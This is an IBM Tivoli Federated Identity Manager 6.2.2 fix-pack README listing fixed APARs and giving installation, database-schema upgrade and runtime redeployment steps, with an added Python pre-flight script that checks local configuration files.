SYMPTOM: The RelayState query string parameter provided to the IP-initiated SSO initial URL is used to populate the RelayState macro in the authentication response when the target query string parameter is empty or not provided. It should be ignored.
IV26049
SYMPTOM: The SAML 1.1 STS Token Module fails to populate the STSUU's Principal correctly when the inbound SAML Assertion contains an AuthenticationStatement with a type attribute that is set to something other than "saml:AuthenticationStatement".
IV31657
SYMPTOM: A blank page is shown during FSSO.
IV31658
SYMPTOM: Corrupted URLs in the feds.xml and sps.xml when a non-sps URL is provided for Single Sign-On Service, Single Logout Service, Soap Endpoint, Artifact Resolution Service, Assertion Consumer Service or Name ID Management Service URLs in the SAML 2.0 IP/SP Federation properties page via Management Console.
IV31660
SYMPTOM: Some Service Providers for the WS-Federation Passive Profile do not accept RequestSecurityTokenResponse messages that contain certain elements. For example, SharePoint does not accept a RequestSecurityTokenResponse that contains the elements wst:Forwardable, wst:Delegatable, wst:Status and wst:Renewing. However, these elements are present in the RequestSecurityTokenResponse generated by the TFIM Identity Provider for the WS-Federation Passive Profile. (See the documentation updates for APAR IV31660)
IV31661
SYMPTOM: The default value of the attribute that the alias service uses to denote the user identifier is "uid". The LDAP Migration Tool supports only the default value and does not work for any value other than the default value. (See the documentation updates for APAR IV31661)
IV31641
SYMPTOM: SubjectConfirmationData is missing when generating a SAML 2.0 assertion with Bearer subject confirmation method and no claims is supplied in the RST.
IV27198
SYMPTOM: Missing ds in InclusiveNamespace Prefix for SAML 2.0 Assertion Signature element.
IV21668
SYMPTOM: FIM doesn't provide 2048 bit option as key size when generating certificate request or self-signed certificate through console.
IV33064
SYMPTOM: When using the manageItfimStsChainMapping CLI command to create a response file, the values of AppliesTo service name and namespace are provided in the wrong attributes appliesToPortTypeName and appliesToPortTypeNamespace.
IV32867
SYMPTOM: NullPointerException is thrown during initial loading of configurations after starting WebSphere.
IV32874
SYMPTOM: Latitude and accuracy affect risk score in location-based matching.
IV32875
SYMPTOM: Running the CLI command manageRbaPolicy with the "update" or "create" operation generates an additional wrong message on the prompt.
IV32904
SYMPTOM: DocumentNotFound exception is thrown for "itfim/rba/rba.properties" when running the CLI command manageRbaConfiguration with the "deploy" operation.
IV32936
SYMPTOM: Device Registration Audit event shows that it is successful even though the device is not getting registered.
IV32937
SYMPTOM: Example matcher file "language.js" returns boolean instead of Enum.
Problems fixed by fix pack 6.2.2-TIV-TFIM-FP0002
- IV23423
- SYMPTOM: Improve SAML signature conformance.
- IV23435
- SYMPTOM: Improve signature conformance.
- IV23451
- SYMPTOM: Improve OpenID signature conformance.
- IV21908
- SYMPTOM: TFIM invalidates the AuthnRequest message when the
Assertion Consumer Service URL doesn't exactly match the configured
URL. (See the documentation updates for APAR IV21908)
- IV21963
- SYMPTOM: The STSUUSER principal does not match the incoming
subject name id of the assertion. (See the documentation updates for
APAR IV21963)
- IV21960
- SYMPTOM: The 'Federate this account link' is incorrectly
generated as null?RelayState= in the ivtapp's federations.jsp page of
the identity provider.
- IV19945
- SYMPTOM: The TFIM USC feature generates a validation email
message that contains a link to complete the enrollment flow. That
link is passed as a macro to the email template when the email is
generated. A customizer who wants to modify the flow by changing the
link location must edit the email template file to point somewhere
else, but must also add the nonce to the query string of that link.
With the current macros this is difficult because the nonce is not
provided as a separate macro. (See the documentation updates for
APAR IV19945.)
- IV17419
- SYMPTOM: The TFIM SPS is missing HTTP methods that certain
protocols require. For example, REST protocols need at a minimum
GET, POST, PUT, and DELETE. This fix adds the missing methods, but
also ensures that if existing delegates are called with previously
unsupported methods, the returned status code is still 405, exactly
as before the change.
- IV19827
- SYMPTOM: The TFIM Single Sign On protocol service (SPS) SAML
2.0 protocol implementation allows a customer to use the
'urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified' name
identifier for single sign-on. By default TFIM treats an
'urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified' name
identifier as an 'urn:oasis:names:tc:SAML:2.0:nameid-format:persistent'
name identifier unless the default name identifier is set to another
type, such as emailAddress. The Single Logout operation incorrectly
queries the alias service when the unspecified name identifier is used
and the default name identifier is set to email. (See the documentation
updates for APAR IV19827.)
- IV19593
- SYMPTOM: Unable to initialize CARS audit event handler
plugin when the CARS webservice URL is an HTTPS endpoint.
- IV19846
- SYMPTOM: In the IBM Tivoli Federated Identity Manager Web
Service Security Management Configuration Guide, a method is
provided on how to associate the shared library with a server.
This method cannot be used if FSSO is configured in the same
WebSphere Application Server. A new method that associates
the shared library with the web service provider or requester
is documented. This new method does not have the same
limitation. (See the documentation updates for APAR
IV19846.)
- IV19850
- SYMPTOM: A command cited in the installation documentation
contains a typographical error. (See the documentation updates
for APAR IV19850.)
- IV16979
- SYMPTOM: The Base64-encoded token generated by the IVCred
STS module is split into multiple lines. This is not desirable in
some cases. (See the documentation updates for APAR
IV16979.)
- IV18104
- SYMPTOM: No error message is reported when importing SAML
2.0 IdP or SP metadata that contains an Organization element with no
OrganizationURL element.
- IV16948
- SYMPTOM: SLO fails when two SPs are authenticated using the
same session index and both SP federations are on the same TFIM
domain.
- IV18112
- SYMPTOM: The STS obtains the base security token for
execution either from the Base element of the RequestSecurityToken
message or from the WS-Security tokens included in the SOAP headers.
Tivoli Federated Identity Manager takes the first WS-Security token found in the SOAP header.
After this modification, when the change is enabled, the SAML STS
modules look for the appropriate token type among the tokens included
in the WS-Security headers. (See the documentation updates for APAR
IV18112.)
- IV16977
- SYMPTOM: Certain points of contact that use the external
authentication interface do not recognize the identity of the user
that Tivoli Federated Identity Manager sets in the response HTTP header (typically
"am-fim-eai-user-id"), because these points of contact are not aware
that TFIM URL-encodes this identity. In such cases, TFIM should
not URL-encode this identity.
- IV16994
- SYMPTOM: Requests to the Tivoli Federated Identity Manager WS-Trust 1.3 endpoint URL with
the ?WSDL parameter, made to retrieve the WSDL document, cause subsequent
SOAP services to fail.
- IV17595
- SYMPTOM: NullPointerException is thrown when sending SAML
2.0 messages (e.g., Logout Request) with invalid IssueInstant
attribute.
- IV17871
- SYMPTOM: The Tivoli Federated Identity Manager STS does not
support the RequestType and KeyType elements on the
RequestSecurityTokenResponse message. The RequestType value should be
set to the value received on the request, and the KeyType should be
set to one of the values supported by WS-Trust, based on an attribute
in the STS universal structure. (See the documentation updates for
APAR IV17871.)
- IV17875
- SYMPTOM: Tivoli Federated Identity Manager is incorrectly processing SAML aliases with
certain directory servers.
- IV17870
- SYMPTOM: Unable to customize the error page for error
FBTSPS061E as there is no event mapping associated with this event.
- IV17609
- SYMPTOM:
- When creating an identity provider federation, the OAuth
1.0 and OAuth 2.0 options are erroneously displayed.
- OAuth 1.0 and OAuth 2.0 federations do not provide
identity information to the STS for use in mapping rules.
- Macro replacement is not available on OAuth 1.0 or OAuth
2.0 pages.
- POST is not supported at OAuth authorize endpoints.
- The Tivoli Access Manager configuration utility (tfimcfg.jar) does not set the '-b ignore'
flag for OAuth 2.0 federations.
- Updating OAuth 2.0 endpoints in the federations
configuration panel can lead to UndeterminableProtocolException at
runtime.
- When an OAuth 1.0 client requests a temporary token
without specifying a realm, uses that temporary token to obtain an
access token, and then uses that access token and specifies a
realm, Tivoli Federated Identity Manager throws a realm validation exception.
(See the documentation updates for APAR IV17609.)
- IV17409
- SYMPTOM: The AuthenticatingAuthority sub-element in the SAML
AuthnContext is not available in Tivoli Federated Identity Manager.
(See the documentation updates for APAR IV17409.)
- IV17413
- SYMPTOM: RelayState URL encoding and decoding in SAML 2.0
unsolicited SSO can only be configured at the global level. Support
for federation and partner level configuration is required. (See the
documentation updates for APAR IV17413.)
- IV17403
- SYMPTOM: The sample TDI mapping rule is missing the
AuthenticatingAuthority attribute.
- IV17412
- SYMPTOM: Tivoli Access Manager WebSEAL failover cookies do
not work when Tivoli Federated Identity Manager is configured to
generate IV credential tokens without using PDAcld. (See the
documentation updates for APAR IV17412.)
- IV17180
- SYMPTOM: The manageItfimPointOfContact CLI does not update
the runtime custom properties when deploying Tivoli Federated
Identity Manager runtime without providing the point of contact
settings override response file.
- IV17411
- SYMPTOM:
- When defining a text field in GUIXML, and setting its
default value to a string containing a quotation mark, Tivoli
Federated Identity Manager throws an exception when loading the
GUIXML page saying that the XML is invalid.
- In an STS module which has an 'init' page widget which
has a multi-valued TextField, only the first value of the multiple
values is displayed when viewing the module instance properties.
- IV17485
- SYMPTOM: The Tivoli Federated Identity Manager Single Sign On protocol service (SPS)
collects the HTTP request information to route the single sign-on
flow. That information is used to send the request to the appropriate
delegate protocol, to generate the response in the appropriate
locale, to authenticate the user, and so on. The HTTP request information
is successfully consumed by the SPS but is never made available to the
Security Token Service (STS). (See the documentation updates for APAR IV17485.)
- IV17421
- SYMPTOM: The Tivoli Federated Identity Manager HTTP server
Web Plugins do not support the latest versions of IIS or Apache/IHS
on new operating systems. (See the documentation updates for APAR IV17421.)
- IV17422
- SYMPTOM: After migrating to Tivoli Federated Identity
Manager 6.2.2 from a previous version, OAuth event mappings are not
shown in the Event pages. Hence, customization of the template pages
is not available. (See the documentation updates for APAR IV17422.)
- IV15372
- SYMPTOM: The Tivoli Federated Identity Manager Kerberos
Delegation STS module does not support running in 64-bit JVMs on 64-bit
versions of Windows. (See the documentation updates for APAR IV15372.)
Be aware of the following considerations before installing this
fix pack:
WARNING:
It is strongly suggested that you back up your existing one-time password pages if both of the following conditions apply:
- You are currently on TFIM 6.2.2 Fix Pack 4.
- You have modified the HTML pages in the FIM_INSTALL_DIR/pages/locale/otp directory.
The 6.2.2 fix pack installation overwrites the existing one-time password pages
if you are upgrading from Fix Pack 4. If you want to keep using your existing one-time password pages,
you must migrate them to the new format.
Installation path specification for the Windows Server 2008
platform
This preinstallation item applies only to installations on a
64-bit Windows platform like Windows Server 2008.
Tivoli Federated Identity Manager is a 32-bit application.
Therefore, its default path when installing on Windows Server 2008
changes from
C:\Program Files\IBM\FIM
to:
C:\Program Files (x86)\IBM\FIM
NOTE: Changing the installation path name affects a 32-bit
WebSphere Application Server on Windows Server 2008.
C:\Program Files\IBM\WebSphere
changes to:
C:\Program Files (x86)\IBM\WebSphere
Prerequisites
You must have the following software installed to install
this fix pack:
- Federated Identity Manager 6.2.2 and its prerequisites
- IBM WebSphere Update Installer version 7.0.0.17 (see Update Installer below.)
Runtime and management service
The runtime and management service component requires
WebSphere® Application Server to be installed. The following list
provides descriptions for various versions of WebSphere Application
Server that are compatible with Tivoli® Federated Identity Manager,
version 6.2.2.
Install one of the following versions of WebSphere Application
Server:
- Embedded WebSphere Application Server Version 6.1. No
preconfiguration is required.
- WebSphere Application Server Network Deployment Version
6.1 with a minimum level of fix pack 23.
NOTE: If you use WebSphere Application Server
fix pack 29 or fix pack 31, you must also apply the fix for the
WebSphere Application Server APAR PM10357.
- WebSphere Application Server Network Deployment Version
7.0 with fix pack 17.
- WebSphere Application Server Network Deployment Version
8.0 with fix pack 1.
Update Installer
This fix pack requires the use of the IBM WebSphere Update Installer
version 7.0.0.17 or later. Ensure that you install the
appropriate version of the IBM WebSphere Update Installer on each computer
where you plan to install the fix pack for the version of WebSphere Application Server used.
You can download the most recent IBM WebSphere Update Installer from the
WebSphere
Application Server Update Installer website. Installation
instructions are on the download page.
Fix pack packaging
This Tivoli Federated Identity Manager 6.2.2-TIV-TFIM-FP0018 patch
package is provided on the Tivoli Support Web site as a single
downloadable zip file for each supported platform. After you select
the appropriate package for the target platform, download the package
and unzip the contents into a target directory. Typically, the
default IBM WebSphere Update Installer maintenance directory is one of the
following:
C:\Program Files\IBM\WebSphere\UpdateInstaller\maintenance
for Windows, or
/opt/IBM/WebSphere/UpdateInstaller/maintenance
for UNIX/Linux.
Unzip the downloaded file before you apply the patch. The unzipped contents
contain one or more .pak files. Each pak file corresponds
to one or more product components. For example, a fix pack
might contain two pak files: one for the administration console and
management service and runtime components, and one for the WSSM
component. The list of product components is included in Fix pack structure.
Use the IBM WebSphere Update Installer to apply the fixes of each pak
file to the target component on the system that you are updating. Apply
all of the pak files that your installation requires, so that
the software levels in your environment are identical for all of the
components for which a pak file is supplied. The fixes are tested
against all affected components together. To minimize any issue that
can arise from applying a partial fix, ensure that you apply the
complete set of files. See Installing
the fix pack for specific instructions on using the Update
Installer to apply the fixes.
Automatic creation of a backup directory
The Update Installer saves backup copies of the files that
it replaces during the installation. You do not need to manually
back up the Federated Identity Manager files.
Incorrect keystore path
The WebSphere Application Server keystore path that is specified in fim.appservers.properties
might be incorrect. If the property was.keystore.file is present, ensure that the value
is correct before you proceed with the installation.
NOTE: Before installing this fix pack, ensure
that you have reviewed the prerequisites in Before installing the
fix pack.
To obtain the fix pack, go to the IBM
Fix Central Web site.
NOTE: The information provided below is only required for
instances where the WebSphere Application Server administrator
credentials have been changed since Tivoli Federated Identity Manager
was installed. The WebSphere Application Server administrator
credentials are retained by the installer so that Federation First Steps
works immediately after installation.
If security is enabled on the WebSphere Application Server where
Federated Identity Manager is installed, set the appropriate password
values in the fim.appservers.properties
file before you can
apply the fix pack.
If security is not enabled, you can skip this step.
NOTE: If you add passwords to the fim.appservers.properties
file, as described below, specify the passwords using plain text.
However, at the end of the fix pack installation process the
passwords are obfuscated and are no longer available in plain text
format.
To specify security passwords, use the following procedure:
- Using a text editor, open the file FIM_INSTALL_DIR/etc/fim.appservers.properties.
- If the was.security.enabled property is present in the
fim.appservers.properties file and is set to true, add two
password properties to the file:
- was.admin.user.pwd, with the administrator login password for the
WebSphere Application Server where Federated Identity Manager is deployed
- was.truststore.pwd, with the password for the trust store used for
client-side SSL authentication in that WebSphere Application Server
For example:
was.admin.user.pwd=was_admin_pw
was.truststore.pwd=truststore_pw
- If the ewas.security.enabled property is present in the
fim.appservers.properties file and is set to true, add two
password properties to the file:
- ewas.admin.user.pwd, with the administrator login password for the
Embedded WebSphere Application Server where Federated Identity Manager is deployed
- ewas.truststore.pwd, with the password for the trust store used for
client-side SSL authentication in that Embedded WebSphere Application Server
For example:
ewas.admin.user.pwd=ewas_admin_pw
ewas.truststore.pwd=truststore_pw
- Save and close the fim.appservers.properties file.
- Unzip the file that you downloaded in Downloading the fix pack,
preferably into the default IBM WebSphere Update Installer maintenance
directory:
C:\Program Files\IBM\WebSphere\UpdateInstaller\maintenance
for Windows, or
/opt/IBM/WebSphere/UpdateInstaller/maintenance
for UNIX/Linux.
- Ensure that the WebSphere Application Server that hosts the
Federated Identity Manager runtime and management service component
is running.
- Ensure that the WebSphere Application Server that hosts the
Federated Identity Manager console component is running.
- Start the appropriate IBM WebSphere Update Installer (typically
located in C:\Program Files\IBM\WebSphere\UpdateInstaller
on Windows systems, or in /opt/IBM/WebSphere/UpdateInstaller
on UNIX-based systems).
- In the Welcome window click Next. Federated Identity
Manager is not listed, but is supported.
- Specify the path to the installation directory for Federated
Identity Manager (typically C:\Program Files\IBM\FIM on
Windows systems, or /opt/IBM/FIM on UNIX-based systems),
then click Next.
- Select Install maintenance in the dialog.
- Specify the path where the fix pack (.pak) files
were unzipped. The Update Installer automatically detects, enables,
and displays the FIM fixes (pak files).
- Determine which product components are installed on the
system that you are updating. Install only the pak files
that correspond to the components on the target system. To determine
the names and version levels of the product components installed on
the target system, view the contents of the
FIM_INSTALL_DIR/etc/version.properties
file with a text editor. The following list describes how to
interpret the properties in the version.properties
file:
itfim.build.version.rte-mgmtsvcs=version
- Specifies that the management service and runtime
component is installed at the level specified by version.
itfim.build.version.mgmtcon=version
- Specifies that the administration console component is
installed at the level specified by version.
itfim.build.version.wsprov=version
- Specifies that the WS-provisioning runtime component is
installed at the level specified by version.
itfim.build.version.wssm=version
- Specifies that the Web services security management
(WSSM) component is installed at the level specified by version.
itfim.build.version.fimpi=version
- Specifies that the Web plug-in (either the Internet
Information Services (IIS) Web plug-in or the Apache/IBM HTTP
Server Web plug-in) is installed at the level specified by version.
Apply the fix packs to the product's components in the
following order:
- Management service and runtime and administration
console
- Other components
NOTE: If a domain is not created before application of
Tivoli Federated Identity Manager fix pack, the fix pack installation
completes successfully with a "Partially Successful" message.
- Compare the list of installed components to the list of pak
files in the IBM WebSphere Update Installer and select the pak files that
correspond to the installed components, then click Next.
NOTE: The IBM WebSphere Update Installer allows you to
select more than one pak file at a time for execution. Select only
the pak files that correspond to the components that are installed on
the system you are updating. If you accidentally install more pak
files than needed, you can separately uninstall any
fix packs for components that are not installed on the
target system.
- If needed (for example, if you need to install multiple pak
files on the target system, and you only installed one pak file),
repeat the previous step to install any additional pak files on the
target system.
NOTE: If you are using the Kerberos Delegation STS module,
do the following to ensure that the Kerberos Delegation DLL is
not loaded in the Java Virtual Machine when it is replaced during
runtime component deployment:
- Restart all the runtime nodes.
- Do not make any requests to the STS chain that invokes the Kerberos Delegation STS
module.
- Deploy the runtime component. See Deploying the
fix pack runtime component for details.
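The pre-installation checks described above can be scripted: reading FIM_INSTALL_DIR/etc/version.properties to decide which pak files apply, checking that was.admin.user.pwd and was.truststore.pwd (or the ewas.* pair) are present whenever the matching security.enabled flag is true, and confirming that the was.keystore.file path in fim.appservers.properties exists. The following Python script is an added example, not part of this README or of the product. The property and component key names are taken from the text above; the readable component labels, the sample file contents, and the choice of reading the directory from the first argument or the FIM_INSTALL_DIR environment variable are this example's own assumptions.

```python
# Pre-flight check before applying the fix pack (added example, not IBM code).
# Reads FIM_INSTALL_DIR/etc/fim.appservers.properties and version.properties.
import os
import re
import sys

# Keys documented for version.properties, mapped to readable component names (labels assumed).
COMPONENTS = {
    "itfim.build.version.rte-mgmtsvcs": "management service and runtime",
    "itfim.build.version.mgmtcon": "administration console",
    "itfim.build.version.wsprov": "WS-provisioning runtime",
    "itfim.build.version.wssm": "Web services security management (WSSM)",
    "itfim.build.version.fimpi": "Web plug-in (IIS or Apache/IHS)",
}
# When a security flag is true, both password properties must be present.
REQUIRED_PASSWORDS = {
    "was.security.enabled": ("was.admin.user.pwd", "was.truststore.pwd"),
    "ewas.security.enabled": ("ewas.admin.user.pwd", "ewas.truststore.pwd"),
}

def _continues(line):
    """A .properties line continues when it ends with an odd number of backslashes."""
    trailing = len(line) - len(line.rstrip("\\"))
    return trailing % 2 == 1

def _unescape(s):
    """Undo the escapes that matter for keys and Windows paths: backslash, colon, equals, space."""
    return (s.replace("\\\\", "\x00").replace("\\:", ":").replace("\\=", "=")
             .replace("\\ ", " ").replace("\x00", "\\"))

def parse_properties(text):
    """Minimal Java .properties reader: comments, '=' or ':' separators, line continuations."""
    props, pending, continuing = {}, "", False
    for raw in text.splitlines():
        line = raw.strip()  # continuation lines drop leading whitespace, as Java does
        if not continuing and (not line or line[0] in "#!"):
            continue
        if _continues(line):
            pending, continuing = pending + line[:-1], True
            continue
        pending, continuing = pending + line, False
        m = re.match(r"((?:\\.|[^=:\s\\])+)\s*[=:]?\s*(.*)", pending)
        pending = ""
        if m:
            props[_unescape(m.group(1))] = _unescape(m.group(2))
    return props

def installed_components(version_props):
    """Map component name -> version for every component key present in version.properties."""
    return {name: version_props[key] for key, name in COMPONENTS.items() if key in version_props}

def missing_password_properties(app_props):
    """Password properties the README requires that fim.appservers.properties does not set."""
    missing = []
    for flag, pwds in REQUIRED_PASSWORDS.items():
        if app_props.get(flag, "").strip().lower() == "true":
            missing.extend(p for p in pwds if not app_props.get(p))
    return missing

def keystore_path_problem(app_props, exists=os.path.isfile):
    """Return the was.keystore.file value if it is set but does not exist, else None."""
    path = app_props.get("was.keystore.file")
    if not path:
        return None  # property absent: nothing to verify
    return None if exists(path) else path

def preflight(appservers_text, version_text, exists=os.path.isfile):
    """Run all three checks on the file contents and return a report dict."""
    app, ver = parse_properties(appservers_text), parse_properties(version_text)
    return {"components": installed_components(ver),
            "missing_passwords": missing_password_properties(app),
            "bad_keystore": keystore_path_problem(app, exists)}

# Constructed sample contents, not copied from a real installation.
SAMPLE_APPSERVERS = """\
# WebSphere settings recorded by the FIM installer (constructed sample)
was.security.enabled=true
was.admin.user=wasadmin
was.keystore.file=/opt/IBM/WebSphere/AppServer/etc/key.p12
ewas.security.enabled=false
"""
SAMPLE_VERSION = """\
itfim.build.version.rte-mgmtsvcs=6.2.2.0
itfim.build.version.mgmtcon=6.2.2.0
"""

if __name__ == "__main__":
    fim_dir = sys.argv[1] if len(sys.argv) > 1 else os.environ.get("FIM_INSTALL_DIR", "/opt/IBM/FIM")
    etc = os.path.join(fim_dir, "etc")
    if os.path.isdir(etc):
        with open(os.path.join(etc, "fim.appservers.properties")) as f:
            app_text = f.read()
        with open(os.path.join(etc, "version.properties")) as f:
            ver_text = f.read()
    else:
        print("no %s directory; checking the constructed sample instead" % etc)
        app_text, ver_text = SAMPLE_APPSERVERS, SAMPLE_VERSION
    report = preflight(app_text, ver_text)
    for name, version in report["components"].items():
        print("installed: %-42s %s" % (name, version))
    for prop in report["missing_passwords"]:
        print("MISSING: set %s in fim.appservers.properties before applying the fix pack" % prop)
    if report["bad_keystore"]:
        print("BAD PATH: was.keystore.file=%s does not exist" % report["bad_keystore"])
```

Run it on the target system as `python preflight.py /opt/IBM/FIM` (or with FIM_INSTALL_DIR set). The parser handles the backslash escaping that Java writes into Windows paths, so a value such as `C\:\\Program Files\\IBM\\...` is checked as the real on-disk path rather than the escaped form.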
If you have configured the one-time password user information provider plug-in to retrieve values from a database,
you must update the database schema for one-time password user information.
- Stop the WebSphere Application Server that hosts the
Federated Identity Manager runtime and management service component.
- Run the .sql file to update the database schema for one-time password user information.
- DB2
- Linux or UNIX operating systems
The .sql file to upgrade the database for DB2 is in the FIM_HOME/dbscripts/db2/
directory. For example, the directory is /opt/IBM/FIM/dbscripts/db2/
.
- Edit the upgrade_schema.sql file, and replace &DBUSER with the database user name.
- Run the upgrade_schema.sql file by using the db2 command. For example:
db2 -tvf /opt/IBM/FIM/dbscripts/db2/upgrade_schema.sql
When prompted for a password, type the database user password and press Enter.
- Windows operating systems
The .sql file to upgrade the database for DB2 is in the FIM_HOME\dbscripts\db2\
directory. For example, the directory is C:\Program Files\IBM\FIM\dbscripts\db2\
.
- Edit the upgrade_schema.sql file, and replace &DBUSER with the database user name.
- Run the upgrade_schema.sql file by using the db2 command. For example:
db2 -tvf C:\Progra~1\IBM\FIM\dbscripts\db2\upgrade_schema.sql
When prompted for a password, type the database user password and press Enter.
- solidDB
- Linux or UNIX operating systems
The .sql file to upgrade the database for solidDB is in the FIM_HOME/dbscripts/soliddb/
directory. For example, the directory is /opt/IBM/FIM/dbscripts/soliddb/
.
Run the upgrade_schema.sql file by using the solsql command: solsql "NETWORK_NAME" FIM_DB DBPASSWORD /opt/IBM/FIM/dbscripts/soliddb/upgrade_schema.sql
where
NETWORK_NAME
: Specifies the network name of a solidDB server to which you are connecting.
DBPASSWORD
: Specifies the database password.
For example: solsql "tcpip 1964" FIM_DB password /opt/IBM/FIM/dbscripts/soliddb/upgrade_schema.sql
- Windows operating systems
The .sql file to upgrade the database for solidDB is in the FIM_HOME\dbscripts\soliddb\
directory. For example, the directory is C:\Program Files\IBM\FIM\dbscripts\soliddb\
.
Run the upgrade_schema.sql file by using the solsql command: solsql "NETWORK_NAME" FIM_DB DBPASSWORD C:\Progra~1\IBM\FIM\dbscripts\soliddb\upgrade_schema.sql
where
NETWORK_NAME
: Specifies the network name of a solidDB server to which you are connecting.
DBPASSWORD
: Specifies the database password.
For example: solsql "tcpip 1964" FIM_DB password C:\Progra~1\IBM\FIM\dbscripts\soliddb\upgrade_schema.sql
- Start the WebSphere Application Server that hosts the
Federated Identity Manager runtime and management service component.
If you used a fix pack earlier than 6.2.2-TIV-TFIM-FP0012 to install, deploy, and configure risk-based access,
you must update the database schema for risk-based access after installing this fix pack.
- Stop the WebSphere Application Server that hosts the runtime security service of Tivoli Security Policy Manager and Federated Identity Manager runtime and management service component.
- Run the .sql file to update the database schema for risk-based access.
- DB2
- Linux or UNIX operating systems
The .sql file to upgrade the database for DB2 is in the FIM_HOME/rba/dbscripts/db2/
directory. For example, the directory is /opt/IBM/FIM/rba/dbscripts/db2/
.
- Edit the upgrade_schema.sql file, and replace &DBUSER with the database user name.
- Run the upgrade_schema.sql file by using the db2 command. For example:
db2 -tvf /opt/IBM/FIM/rba/dbscripts/db2/upgrade_schema.sql
When prompted for a password, type the database user password and press Enter.
- Windows operating systems
The .sql file to upgrade the database for DB2 is in the FIM_HOME\rba\dbscripts\db2\
directory. For example, the directory is C:\Program Files\IBM\FIM\rba\dbscripts\db2\
.
- Edit the upgrade_schema.sql file, and replace &DBUSER with the database user name.
- Run the upgrade_schema.sql file by using the db2 command. For example:
db2 -tvf C:\Progra~1\IBM\FIM\rba\dbscripts\db2\upgrade_schema.sql
When prompted for a password, type the database user password and press Enter.
- solidDB
- Linux or UNIX operating systems
The .sql file to upgrade the database for solidDB is in the FIM_HOME/rba/dbscripts/soliddb/
directory. For example, the directory is /opt/IBM/FIM/rba/dbscripts/soliddb/
.
Run the upgrade_schema.sql file by using the solsql command: solsql "NETWORK_NAME" RBA_DB DBPASSWORD /opt/IBM/FIM/rba/dbscripts/soliddb/upgrade_schema.sql
where
NETWORK_NAME
: Specifies the network name of a solidDB server to which you are connecting.
DBPASSWORD
: Specifies the database password.
For example: solsql "tcpip 1964" RBA_DB password /opt/IBM/FIM/rba/dbscripts/soliddb/upgrade_schema.sql
- Windows operating systems
The .sql file to upgrade the database for solidDB is in the FIM_HOME\rba\dbscripts\soliddb\
directory. For example, the directory is C:\Program Files\IBM\FIM\rba\dbscripts\soliddb\
.
Run the upgrade_schema.sql file by using the solsql command: solsql "NETWORK_NAME" RBA_DB DBPASSWORD C:\Progra~1\IBM\FIM\rba\dbscripts\soliddb\upgrade_schema.sql
where
NETWORK_NAME
: Specifies the network name of a solidDB server to which you are connecting.
DBPASSWORD
: Specifies the database password.
For example: solsql "tcpip 1964" RBA_DB password C:\Progra~1\IBM\FIM\rba\dbscripts\soliddb\upgrade_schema.sql
- Oracle
- Linux or UNIX operating systems
The .sql file to upgrade the database for Oracle is in the FIM_HOME/rba/dbscripts/oracle/
directory. For example, the directory is /opt/IBM/FIM/rba/dbscripts/oracle/
.
- Change to that directory and set the Oracle SID:
export ORACLE_SID=RBA_DB
- Start SQL*Plus without connecting:
sqlplus /nolog
- At the SQL prompt, connect as the database user:
connect <DB_USER>/<DB_PASSWORD>
- Run the upgrade_schema.sql file:
@upgrade_schema.sql
- Windows operating systems
The .sql file to upgrade the database for Oracle is in the FIM_HOME\rba\dbscripts\oracle\
directory. For example, the directory is C:\Program Files\IBM\FIM\rba\dbscripts\oracle\
.
- Change to that directory and set the Oracle SID:
set ORACLE_SID=RBA_DB
- Start SQL*Plus without connecting:
sqlplus /nolog
- At the SQL prompt, connect as the database user:
connect <DB_USER>/<DB_PASSWORD>
- Run the upgrade_schema.sql file:
@upgrade_schema.sql
- Start the WebSphere Application Server that hosts the runtime security service of Tivoli Security Policy Manager and Federated Identity Manager runtime and management service component.
APAR IV92373 addresses an issue where a user ID collision can occur in the alias service.
The migration script IV92373_ALIASUSERPARTNER_migration.sql is available for download from the same Fix Central location as the TFIM 6.2.2 FP18 package.
To migrate using the provided SQL file:
- Stop network traffic to the TFIM runtime nodes.
- Stop the TFIM runtime nodes that access the JDBC alias database.
- Back up the existing JDBC database tables.
- Inspect IV92373_ALIASUSERPARTNER_migration.sql to make sure that it matches your alias database deployment.
- Run IV92373_ALIASUSERPARTNER_migration.sql. It creates a new unified table and moves the existing entries into that table.
- Restart the TFIM runtime nodes.
- Restore network traffic to the TFIM runtime nodes.
After you install the fix pack, redeploy the Tivoli
Federated Identity Manager runtime. This task is identical to the
deployment task you completed after the initial installation of the
management service and runtime components. In a WebSphere cluster
environment, you must ensure that the new runtime component is deployed
to each WebSphere node.
The initial deployment steps are described in
Creating and deploying a new domain in the
Configuring Guide. The specific instructions for deploying the runtime
begin in step 16.
NOTES:
- You do not have to re-configure the runtime into Tivoli
Access Manager. The Tivoli Access Manager configuration is retained
when the fix pack is applied.
- During redeployment of the runtime in a cluster environment,
you might receive errors, such as, "ClassNotFoundException" in the
WebSphere SystemOut.log files. Any such errors should stop after you
restart the cluster.
Use the following procedure to deploy the updated Federated
Identity Manager runtime:
- Log in to the Integrated Solutions Console.
- Select Domain Management-> Runtime Node
Management.
- Ensure that the new runtime (version 6.2.2.) is
displayed as available.
- Click Deploy Runtime.
- Wait for the deployment to finish by selecting Click
to refresh runtime deployment status and check for completion...
- If the domain was not created before application of Tivoli Federated
Identity Manager fix pack, click Publish Plug-ins.
- Verify that the currently deployed version is now
6.2.2. as follows:
- Navigate to the Runtime Node Management window.
- Look in the Runtime Management section of the Runtime
Nodes portlet in the right panel and review the runtime
information.
Example:
Runtime Information
----------------------------------------------
Current deployed version 6.2.2. [141003a]
NOTE: The number within the brackets [141003a]
might be different from this example.
- Repeat the previous step for each node in a WebSphere
cluster environment.
- Restart WebSphere® Application Server where the Tivoli Federated Identity Manager management service is installed.
After you install the fix pack and redeploy the Tivoli Federated
Identity Manager runtime you must re-publish the plug-ins to the
runtime and reload the configuration.
Use the following procedure to re-publish the plug-ins:
- Log in to the administration console.
- Select Domain Management -> Runtime Node Management.
- Click Publish Plugins.
- After the plug-ins are published, reload the runtime
configuration.
After you install the fix pack, redeploy risk-based access components. This task is identical to the
deployment task you completed after the initial installation of the
risk-based access. In a WebSphere cluster
environment, you must ensure that the wsadmin commands are called on a Deployment Manager node.
The initial deployment steps are described in
Deploying risk-based access in the
Installing, configuring, and administering risk-based access Guide. The specific instructions for deploying risk-based access
begin in step 1.
Use the following procedure to deploy the updated risk-based access components:
- Open a command window and change the current directory to where your WebSphere Application Server profile is located. For example:
- AIX® or Linux systems:
/opt/IBM/WebSphere/AppServer70/profiles/AppSrv01/bin
- Windows systems:
C:\Program Files\IBM\WebSphere\AppServer\profiles\AppSrv01\bin
- To start the wsadmin tool, enter one of the following commands at the command prompt:
- AIX® or Linux systems:
./wsadmin.sh -username username -password password
- Windows systems:
wsadmin.bat -username username -password password
